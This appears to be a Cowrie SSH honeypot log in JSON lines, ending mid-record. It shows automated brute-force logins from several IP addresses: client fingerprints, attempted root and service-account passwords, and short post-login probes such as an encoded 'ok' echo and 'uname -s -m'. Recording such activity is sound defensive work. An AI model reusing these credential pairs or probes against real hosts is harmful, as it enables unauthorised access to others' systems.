{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:15:26.374537Z","src_ip":"212.227.125.160","session":"6ccab149c9d1"}
{"eventid":"cowrie.login.success","username":"root","password":"coulibaly","message":"login attempt [root/coulibaly] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:15:26.447886Z","src_ip":"212.227.125.160","session":"6ccab149c9d1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:15:26.510240Z","src_ip":"212.227.125.160","session":"6ccab149c9d1"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:15:26.510947Z","src_ip":"212.227.125.160","session":"6ccab149c9d1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:26.534806Z","src_ip":"212.227.125.160","session":"6ccab149c9d1"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:26.535826Z","src_ip":"212.227.125.160","session":"6ccab149c9d1"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":50084,"dst_ip":"1.2.3.4","dst_port":22,"session":"671a243b9ef4","protocol":"ssh","message":"New connection: 217.154.1.158:50084 (1.2.3.4:22) [session: 671a243b9ef4]","sensor":"my-vps","timestamp":"2025-08-26T20:15:27.333677Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:15:27.334503Z","src_ip":"217.154.1.158","session":"671a243b9ef4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:15:27.348655Z","src_ip":"217.154.1.158","session":"671a243b9ef4"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"123456","message":"login attempt [deploy/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T20:15:27.394446Z","src_ip":"217.154.1.158","session":"671a243b9ef4"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:28.411104Z","src_ip":"217.154.1.158","session":"671a243b9ef4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52942,"dst_ip":"1.2.3.4","dst_port":22,"session":"46a0c668f0fa","protocol":"ssh","message":"New connection: 212.227.125.160:52942 (1.2.3.4:22) [session: 46a0c668f0fa]","sensor":"my-vps","timestamp":"2025-08-26T20:15:29.653976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:15:29.654739Z","src_ip":"212.227.125.160","session":"46a0c668f0fa"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:15:29.677210Z","src_ip":"212.227.125.160","session":"46a0c668f0fa"}
{"eventid":"cowrie.login.success","username":"root","password":"cherche","message":"login attempt [root/cherche] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:15:29.749791Z","src_ip":"212.227.125.160","session":"46a0c668f0fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:15:29.871046Z","src_ip":"212.227.125.160","session":"46a0c668f0fa"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:15:29.871801Z","src_ip":"212.227.125.160","session":"46a0c668f0fa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:29.894991Z","src_ip":"212.227.125.160","session":"46a0c668f0fa"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:29.896132Z","src_ip":"212.227.125.160","session":"46a0c668f0fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43226,"dst_ip":"1.2.3.4","dst_port":22,"session":"18273ec8d109","protocol":"ssh","message":"New connection: 212.227.125.160:43226 (1.2.3.4:22) [session: 18273ec8d109]","sensor":"my-vps","timestamp":"2025-08-26T20:15:29.916868Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:15:29.917704Z","src_ip":"212.227.125.160","session":"18273ec8d109"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:15:29.939991Z","src_ip":"212.227.125.160","session":"18273ec8d109"}
{"eventid":"cowrie.login.success","username":"root","password":"brochet","message":"login attempt [root/brochet] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:15:30.013727Z","src_ip":"212.227.125.160","session":"18273ec8d109"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:15:30.124396Z","src_ip":"212.227.125.160","session":"18273ec8d109"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:15:30.125078Z","src_ip":"212.227.125.160","session":"18273ec8d109"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:30.148174Z","src_ip":"212.227.125.160","session":"18273ec8d109"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:30.149367Z","src_ip":"212.227.125.160","session":"18273ec8d109"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T20:15:34.677233Z","src_ip":"212.227.125.160","session":"c7ce9d6ff118"}
{"eventid":"cowrie.session.closed","duration":"12.3","message":"Connection lost after 12.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:35.894124Z","src_ip":"212.227.125.160","session":"c7ce9d6ff118"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41560,"dst_ip":"1.2.3.4","dst_port":22,"session":"667a9c5d9429","protocol":"ssh","message":"New connection: 212.227.125.160:41560 (1.2.3.4:22) [session: 667a9c5d9429]","sensor":"my-vps","timestamp":"2025-08-26T20:15:36.110718Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:15:36.111666Z","src_ip":"212.227.125.160","session":"667a9c5d9429"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51683,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9e11beba52e","protocol":"ssh","message":"New connection: 212.227.235.229:51683 (1.2.3.4:22) [session: a9e11beba52e]","sensor":"my-vps","timestamp":"2025-08-26T20:15:36.305888Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:15:36.310310Z","src_ip":"212.227.235.229","session":"a9e11beba52e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:15:36.489699Z","src_ip":"212.227.235.229","session":"a9e11beba52e"}
{"eventid":"cowrie.login.success","username":"root","password":"1q@W3e$R5t","message":"login attempt [root/1q@W3e$R5t] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:15:37.172591Z","src_ip":"212.227.235.229","session":"a9e11beba52e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:15:37.535775Z","src_ip":"212.227.235.229","session":"a9e11beba52e"}
{"eventid":"cowrie.command.input","input":"ssh -V","message":"CMD: ssh -V","sensor":"my-vps","timestamp":"2025-08-26T20:15:37.536488Z","src_ip":"212.227.235.229","session":"a9e11beba52e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","size":58,"shasum":"8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:37.782372Z","src_ip":"212.227.235.229","session":"a9e11beba52e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:37.807933Z","src_ip":"212.227.235.229","session":"a9e11beba52e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T20:15:38.838713Z","src_ip":"212.227.125.160","session":"667a9c5d9429"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T20:15:39.534206Z","src_ip":"212.227.125.160","session":"667a9c5d9429"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:40.755533Z","src_ip":"212.227.125.160","session":"667a9c5d9429"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41576,"dst_ip":"1.2.3.4","dst_port":22,"session":"683f9c06237a","protocol":"ssh","message":"New connection: 212.227.125.160:41576 (1.2.3.4:22) [session: 683f9c06237a]","sensor":"my-vps","timestamp":"2025-08-26T20:15:40.979636Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:15:40.980716Z","src_ip":"212.227.125.160","session":"683f9c06237a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T20:15:41.895793Z","src_ip":"212.227.125.160","session":"683f9c06237a"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:15:42.565269Z","src_ip":"212.227.125.160","session":"683f9c06237a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:15:43.594568Z","src_ip":"212.227.125.160","session":"683f9c06237a"}
{"eventid":"cowrie.command.input","input":"uname -s -m","message":"CMD: uname -s -m","sensor":"my-vps","timestamp":"2025-08-26T20:15:43.595321Z","src_ip":"212.227.125.160","session":"683f9c06237a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","size":13,"shasum":"6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:44.295049Z","src_ip":"212.227.125.160","session":"683f9c06237a"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:44.297000Z","src_ip":"212.227.125.160","session":"683f9c06237a"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":45616,"dst_ip":"1.2.3.4","dst_port":22,"session":"934324a179aa","protocol":"ssh","message":"New connection: 217.154.1.158:45616 (1.2.3.4:22) [session: 934324a179aa]","sensor":"my-vps","timestamp":"2025-08-26T20:15:44.858847Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:15:44.862605Z","src_ip":"217.154.1.158","session":"934324a179aa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:15:44.875522Z","src_ip":"217.154.1.158","session":"934324a179aa"}
{"eventid":"cowrie.login.failed","username":"dev","password":"123456","message":"login attempt [dev/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T20:15:44.988580Z","src_ip":"217.154.1.158","session":"934324a179aa"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:46.006549Z","src_ip":"217.154.1.158","session":"934324a179aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38736,"dst_ip":"1.2.3.4","dst_port":22,"session":"a682fabb1f60","protocol":"ssh","message":"New connection: 212.227.125.160:38736 (1.2.3.4:22) [session: a682fabb1f60]","sensor":"my-vps","timestamp":"2025-08-26T20:15:47.254242Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:15:47.255302Z","src_ip":"212.227.125.160","session":"a682fabb1f60"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SS